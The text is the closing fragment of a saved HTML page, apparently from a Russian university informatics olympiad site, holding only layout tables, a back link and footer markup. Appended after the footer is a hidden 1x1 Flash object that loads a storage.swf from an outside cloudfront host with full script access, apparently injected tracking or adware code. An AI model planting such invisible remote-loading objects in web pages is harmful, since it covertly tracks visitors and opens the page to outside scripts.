	</tr>
</tbody></table>
<br><br>
<table border="0" cellpadding="0" cellspacing="5" width="90%">
	<tbody><tr>
        <td bgcolor="#cccccc" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
		<td>&nbsp;</td>
	</tr>
    <tr>
        <td><a href="http://olymp.ifmo.ru/icms/">« Вернуться</a></td>
    </tr>
</tbody></table>
<!------------------------------------------ /Body ------------------------------------------>
	   </td>
	</tr>
    <tr>
    	   <td align="center" valign="center">
            <!------------------------------------------- Localization ---------------------------------->
                <!-- a href="?lang=ru"><img src="http://olymp.ifmo.ru/icms/shared/images/fe/ru.gif" border="0" alt="Russian"></a>&nbsp;&nbsp;
                <a href="?lang=en"><img src="http://olymp.ifmo.ru/icms/shared/images/fe/en.gif" border="0" alt="English"></a>&nbsp;&nbsp;
                <a href="?lang=it"><img src="http://olymp.ifmo.ru/icms/shared/images/fe/it.gif" border="0" alt="Italian"></a -->&nbsp;
                <br><br><br>
            <!------------------------------------------- /Localization ---------------------------------->
    	   </td>
	   </tr>
	
	<tr>
		<td align="CENTER">
<!------------------------------------------ Footer ------------------------------------------>
<table border="0" cellpadding="0" cellspacing="0" width="90%">
	<tbody><tr>
		<td bgcolor="#999999" height="1"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" height="1" width="1"></td>
	</tr>
	<tr>
		<td bgcolor="#cccccc" height="2"><img src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/spacer.gif" width="2"></td>
	</tr>
	<!--<TR>
	   <td align="center"><a href="http://olymp.ifmo.ru/icms/feedback/">Сообщить об ошибке / Обратная связь / Задать вопрос</a></td>
	</TR>-->
	<tr>
	   <td align="right"><a href="" http:="" www.1adw.ru="" ""="" class="" footer""="" target="" _blank""="">©2009 Студия 1ADW</a></td>
	</tr>
</tbody></table>
<!------------------------------------------ /Footer ------------------------------------------>
		</td>
	</tr>
</tbody></table>

<div id="_GPL_e6a00_div" style="position: absolute;"><object codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" id="_GPL_e6a00_swf" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" height="1" width="1"><param value="http://d3lvr7yuk4uaui.cloudfront.net/items/e6a00/storage.swf" name="movie"><param value="logfn=_GPL.items.e6a00.log&amp;onload=_GPL.items.e6a00.onload&amp;onerror=_GPL.items.e6a00.onerror&amp;LSOName=gpl" name="FlashVars"><param value="always" name="allowscriptaccess"><embed pluginspage="http://www.macromedia.com/go/getflashplayer" flashvars="logfn=_GPL.items.e6a00.log&amp;onload=_GPL.items.e6a00.onload&amp;onerror=_GPL.items.e6a00.onerror&amp;LSOName=gpl" type="application/x-shockwave-flash" allowscriptaccess="always" quality="high" loop="false" play="true" name="_GPL_e6a00_swf" bgcolor="#ffffff" src="%D0%97%D0%B0%D0%BA%D0%BB%D1%8E%D1%87%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D0%BD%D1%8B%D0%B9%20%D1%8D%D1%82%D0%B0%D0%BF.%20%D0%98%D0%BD%D1%84%D0%BE%D1%80%D0%BC%D0%B0%D1%82%D0%B8%D0%BA%D0%B0.%2011%20%D0%BA%D0%BB11%D0%B0%D1%81%D1%81_files/storage.swf" align="middle" height="1" width="1"></object></div></body></html>